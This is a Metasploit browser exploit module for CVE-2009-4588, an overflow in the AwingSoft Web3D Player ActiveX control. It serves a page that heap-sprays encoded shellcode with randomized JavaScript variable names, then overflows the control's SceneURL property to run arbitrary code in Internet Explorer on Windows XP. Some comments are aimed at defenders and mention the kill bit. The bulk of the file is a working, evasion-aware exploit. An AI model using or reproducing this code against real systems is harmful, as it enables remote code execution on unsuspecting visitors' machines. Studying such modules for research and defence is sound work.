##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

##
# awingsoft_web3d_bof.rb
#
# AwingSoft Web3D Player 'SceneURL()' Buffer Overflow exploit for the Metasploit Framework
#
# Tested successfully on the following platforms:
# - Internet Explorer 6, Windows XP SP2
# - Internet Explorer 7, Windows XP SP3
#
# WindsPly.ocx versions tested:
# - 3.0.0.5
# - 3.5.0.0
# - 3.6.0.0 (beta)
#
# Trancer
# http://www.rec-sec.com
##

class MetasploitModule < Msf::Exploit::Remote
  # Browser exploit module for CVE-2009-4588: an overly long value assigned to
  # the 'SceneURL' property of the AwingSoft WindsPly.ocx ActiveX control
  # overruns a buffer (see the module header and 'Description' below). The
  # module hosts one HTML page on its own HTTP server; a visiting Internet
  # Explorer client instantiates the control by CLSID and the page's script
  # performs the property assignment.
  #
  # Defender notes: the served page randomizes every script identifier, so
  # the stable artefacts are the <object> tag carrying the control's CLSID
  # (see on_request_uri) and the assignment to its SceneURL property.
  # Preventing the control from being instantiated (e.g. the ActiveX kill
  # bit for that CLSID) removes the precondition for the overflow.
  Rank = AverageRanking

  # Supplies the HTTP server plus the get_resource / send_response helpers and
  # the on_request_uri callback implemented below.
  include Msf::Exploit::Remote::HttpServer::HTML

  # Registers the module metadata: name, description, authors, references,
  # payload constraints and the single supported target.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'AwingSoft Winds3D Player SceneURL Buffer Overflow',
        'Description' => %q{
This module exploits a data segment buffer overflow within Winds3D Viewer of
AwingSoft Awakening 3.x (WindsPly.ocx v3.6.0.0). This ActiveX is a plugin of
AwingSoft Web3D Player.
By setting an overly long value to the 'SceneURL' property, an attacker can
overrun a buffer and execute arbitrary code.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'shinnai <shinnai[at]autistici.org>', # Original exploit [see References]
          'Trancer <mtrancer[at]gmail.com>', # Metasploit implementation
          'jduck'
        ],
        'References' => [
          [ 'CVE', '2009-4588' ],
          [ 'OSVDB', '60017' ],
          [ 'EDB', '9116' ],
          [ 'URL', 'http://www.rec-sec.com/2009/07/28/awingsoft-web3d-buffer-overflow/' ]
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process'
        },
        'Payload' => {
          'Space' => 1024,
          # Bytes the encoded payload may not contain. In on_request_uri the
          # shellcode is embedded in a single-quoted JavaScript string literal,
          # which presumably explains the quote and backslash exclusions — verify.
          'BadChars' => "\x00\x09\x0a\x0d'\\",
          'StackAdjustment' => -3500
        },
        'Platform' => 'win',
        'Targets' => [
          # data segment size: 76180
          # crasher offsets: 2640, 2712, 8984, 68420, 68424
          # 'Ret' is used in on_request_uri both as the sled filler and as the
          # value repeated into the SceneURL string; 'Offset' is the minimum
          # length of that string.
          [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C, 'Offset' => 8984 } ]
        ],
        'DisclosureDate' => '2009-07-10',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Builds the exploit page for one client request and sends it.
  #
  # @param cli [Rex::Socket] the connected client
  # @param request [Rex::Proto::Http::Request] the incoming request (not inspected here)
  # @return [nil]
  def on_request_uri(cli, request)
    # Re-generate the payload
    # A nil payload means there is nothing to serve. `p` only feeds this check;
    # the encoded bytes are read back through `payload.encoded` below.
    return if ((p = regenerate_payload(cli)) == nil)

    # Encode the shellcode
    # Rendered in the %uXXXX form that JavaScript unescape() accepts, using the
    # target architecture's endianness.
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

    # Setup exploit buffers
    # The target's 32-bit little-endian return value is emitted twice: as an
    # unescape() string (sled filler for the sprayed blocks) and as a
    # URI-encoded string (repeated to build the SceneURL value).
    nops = Rex::Text.to_unescape([target.ret].pack('V'))
    ret = Rex::Text.uri_encode([target.ret].pack('V'))
    blocksize = 0x40000 # length each sprayed block is grown to (see the while loop in the script)
    fillto = 500 # number of blocks stored in the spray array
    offset = target['Offset'] # minimum length of the SceneURL string

    # Randomize the javascript variable names
    # Each identifier is 1..100 alphabetic characters (2..31 for the loop
    # counter), so no script identifier is stable between requests.
    winds3d = rand_text_alpha(rand(100) + 1)
    j_shellcode = rand_text_alpha(rand(100) + 1)
    j_nops = rand_text_alpha(rand(100) + 1)
    j_ret = rand_text_alpha(rand(100) + 1)
    j_headersize = rand_text_alpha(rand(100) + 1)
    j_slackspace = rand_text_alpha(rand(100) + 1)
    j_fillblock = rand_text_alpha(rand(100) + 1)
    j_block = rand_text_alpha(rand(100) + 1)
    j_memory = rand_text_alpha(rand(100) + 1)
    j_counter = rand_text_alpha(rand(30) + 2)

    # we must leave the page, so we use http-equiv and javascript refresh methods
    # Page layout: a meta refresh back to get_resource after one second, an
    # <object> tag instantiating the control by CLSID, and a script that fills
    # an array of `fillto` strings of about `blocksize` characters (sled +
    # shellcode), then assigns a string of more than `offset` characters to the
    # control's SceneURL property before scheduling a second navigation.
    html = %Q|<html>
<head><meta http-equiv="refresh" content="1;URL=#{get_resource}"></head>
<object classid='clsid:17A54E7D-A9D4-11D8-9552-00E04CB09903' id='#{winds3d}'></object>
<script>
#{j_shellcode}=unescape('#{shellcode}');
#{j_nops}=unescape('#{nops}');
#{j_headersize}=20;
#{j_slackspace}=#{j_headersize}+#{j_shellcode}.length;
while(#{j_nops}.length<#{j_slackspace})#{j_nops}+=#{j_nops};
#{j_fillblock}=#{j_nops}.substring(0,#{j_slackspace});
#{j_block}=#{j_nops}.substring(0,#{j_nops}.length-#{j_slackspace});
while(#{j_block}.length+#{j_slackspace}<#{blocksize})#{j_block}=#{j_block}+#{j_block}+#{j_fillblock};
#{j_memory}=new Array();
for(#{j_counter}=0;#{j_counter}<#{fillto};#{j_counter}++)#{j_memory}[#{j_counter}]=#{j_block}+#{j_shellcode};

var #{j_ret} = unescape('#{ret}');
while (#{j_ret}.length <= #{offset}) { #{j_ret} = #{j_ret} + unescape('#{ret}'); }
#{winds3d}.SceneURL = #{j_ret};
setTimeout('window.location = "#{get_resource}";', 500);
</script>
</html>
|

    print_status("Sending #{self.name}")

    # Transmit the response to the client
    send_response(cli, html, { 'Content-Type' => 'text/html' })

    # Handle the payload
    # Hands the client connection to the framework's payload handler.
    handler(cli)
  end
end